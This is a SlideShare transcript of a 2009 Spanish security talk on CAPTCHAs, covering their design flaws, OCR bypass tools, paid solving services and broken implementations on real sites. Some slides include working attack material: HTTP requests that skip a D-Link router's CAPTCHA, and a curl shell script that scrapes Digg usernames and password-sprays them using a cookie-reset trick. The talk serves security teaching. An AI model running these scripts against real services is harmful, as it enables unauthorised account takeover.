Crapcha Sv1.0   Slide Share
Upcoming SlideShare
Loading in...5
×
 

Crapcha Sv1.0 Slide Share

on

  • 5,217 views

CAPTCHAs

CAPTCHAs

Statistics

Views

Total Views
5,217
Slideshare-icon Views on SlideShare
3,834
Embed Views
1,383

Actions

Likes
1
Downloads
128
Comments
0

6 Embeds 1,383

http://www.elladodelmal.com 570
http://www.securitybydefault.com 546
http://elladodelmal.blogspot.com 244
http://www.slideshare.net 21
file:// 1
http://translate.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Crapcha Sv1.0   Slide Share Crapcha Sv1.0 Slide Share Presentation Transcript

    • C[R]APCHAS. Alejandro Ramos CISSP, CISA Salamanca – Julio 2009 securitybydefault.com
    • Completely Automated Public Turing test to CAPTCHAS. tell Computers and Humans Apart. Prueba de Turing pública y automática para C[R]APCHAS. diferenciar máquinas y humano Curso de Verano - Salamanca, julio 2009
    • Introducción • Creador Luis von Ahn, Manuel Blum y Nicolas J. Hooper • Año 2000 • Evitar añadir sitios al directorio de Yahoo! automáticamente. • Pregunta – Respuesta • Reverse Turing C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • • Antes de llevar a cabo una acción se comprueba la condición de Hommer. • Previene que software automático realice: – SPAM: blogs, wikis, foros – Registro masivo de usuarios – Votaciones – Fuerza Bruta de usuarios / contraseñas • Diseño: – Fácil de resolver para el hombre – Difícil de resolver para la máquina – Fácil de generar y evaluar C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Tipos de captcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿Contraseña? ¿Correcta? NO SI ¿allant? NO SI C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Evolución EZ-Gimpy + Contraste + Fondo + Fuente no fija + Línea - Fondos + Superposición C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Captchas no resolvibles Accesibilidad http://www.w3.org/TR/turingtest/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Vulnerabilidades • Tipo de letra: – No variable – Sin rotación – Colores fijos – Sin deformación – Sin superposición – Misma posición de caracteres – Misma longitud de caracteres – Reducido código de caracteres • Fondo: – Colores fijos – Sin textura o textura fija C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Diseño seguro • Rotar colores en la fuente y el fondo. • Uso de mayúsculas y minúsculas. • Letras más oscuras y más claras que el fondo. • Uso de escala de colores (gradient). • No alinear los caracteres horizontalmente. • Sobreponer las letras. • No utilizar palabras de diccionario. • Distinta longitud de caracteres. • Dibujar líneas sobre las letras del mismo color. • Amplio código de caracteres. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Métodos para saltar CAPTCHAs • Mediante el uso de OCR / IVR • Explotando la implantación - MoBIC • Usando mano de obra barata C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Cortar, copiar, pintar y colorear A R C 3 I C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Herramientas Disponibles • PWNtcha: http://caca.zoy.org/wiki/PWNtcha • CAP-OCR: http://cap-cap.ru/ • Captcha Breaker: http://churchturing.org/captcha- dist/ • aiCaptcha: http://www.mperfect.net/aiCaptcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • PWNtcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Ataques 2008 Google (Jan 17) 20% Hotmail (Feb 6) 30-35% Yahoo (Feb 22) 30-35% C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Software C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • jDownloader. jAntiCaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Software comercial http://www.guruperl.net/products/captcha-bypass/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Software comercial http://www.guruperl.net/products/captcha-bypass/ http://xrumer-palladium.blogspot.com/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Servicios Captcha http://www.lafdc.com/captcha/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Captchas de Voz •No son efectivos •Más inseguros que los tradicionales de imágenes •Poco difundidos •Pruebas de concepto para Google •IVR (Interactive Voice Response) http://blog.wintercore.com/?p=11 http://vorm.net/captchas C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Resolviendo Captchas a Bajo coste Resolviendo CAPTCHAS Semiautomáticamente C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • A mano… C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Decaptcher.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Explotando usuarios C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • IMPLANTACIONES C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Router D-Link 1. Modificación de los DNS del router por malware (pharming) 2. D-Link actualiza firmware añadiendo un CAPTCHA a la autenticación. 3. La implantación es incorrecta, paginas como la que gestiona contraseña WPA, son accedidas sin necesidad de CAPTCHA GET /post_login.xml?hash=c8[…]a&auth_code=02F&auth_id=26 GET / /post_login.xml?hash=c8[…]6a GET / /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 http://www.milw0rm.com/exploits/8696 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Fallos genéricos en Implantaciones • Re-utilizando el ID de sesión para un CAPTCHA conocido • Envío de identificación de CAPTCHA + solución, re-utilización de CAPTCHAs conocidos. • Reiniciando intentos con usuario conocido • Uso de un número reducido de CAPTCHAS (generación de BBDD) • Vulnerable a otros ataques web: XSS, CSRF, etc C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • DNI-Pasaporte <td align="center" style="font-size: 30pt; font-family: Courier; color: blue;">T</td> <td align="center" style="font-size: 30pt; font-family: Arial; color: blue;">B</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">I</td> <td align="center" style="font-size: 30pt; font-family: Arial Black; color: blue;">J</td> http://rafavargas.com/2008/05/14/un-candidato-a-peor-captcha-de-la-historia/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Red.Es http://mnm.uib.es/gallir/posts/2007/06/09/1108 C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Worlds’s most influential person Revista Time C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Análisis del Captcha - Recaptcha C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • reCaptcha.com •60 millones de captcha resueltos por día •Technorati, meneame, twitter, lastfm.es …. Etc •10 millones de palabras por día C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Inundación de “penis” C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Megaupload.com Descarga de Archivo http://wwwq3.megaupload.com/gencap.php?60d8950a074984e0.gif C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Captchanumbers (php class) http://www.lucianobello.com.ar/post/captchas-the-good-the- bad-and-the-ugly/ C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com •Envío usuario y contraseña mediante un POST •El servidor crea una sesión y devuelve un 302 (redirección) a otra página que comprueba si la sesión es correcta o incorrecta en base al usuario y contraseña •Si la contraseña es válida paso, si no es válida me envía a la página de autenticación con un error y la misma sesión que suma 1 error fallido. •Elimino la sesión (y con ello el contador) y repito el envío de usuario y contraseña, volviendo al punto 1. Por lo que el captcha no aparecerá nunca al no sumar los cuatro intentos. C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com 302 Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos+1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com 302 Se elimina cookie Set-Cookie Se comprueba POST Cookie? session con u/p generada Hay Cookie Fallos = 3 Valido? Cookie: fallos +1 CAPTCHA Validado C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com Usuarios demócratas: (nicknames == usernames) for i in `seq 1 1018`; do curl –d "getdpage=$i&id=10&page=3&friends=0" "http://digg.com/politics/Bobama_s_44th_Amer/who” | grep users|sed -e 's|.*href="/users/(.*)">.*|1|g’ done Password “123456” (nadie la usa) for pass in password 123456; do for i in `cat USUARIOSOBAMA`; do echo -n $i:$pass curl -c digg.txt -s -L -D - -d "username=$i&password=$pass&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|incorrect"; done done |tee -a passwd2.digg C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Digg.com http://www.enriquedans.com/2009/04/digg-0wned.html C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • Conclusiones • Los CAPTCHA son un sistema de eficacia dudable. •El mayor riesgo al que se somete es la mano de obra barata. •Su implantación es compleja y requiere de un análisis profundo. •Un diseño incorrecto puede volver la medida inútil C[R]APCHAS. Curso de Verano - Salamanca, julio 2009
    • C[R]APCHAS. Curso de Verano - Salamanca, julio 2009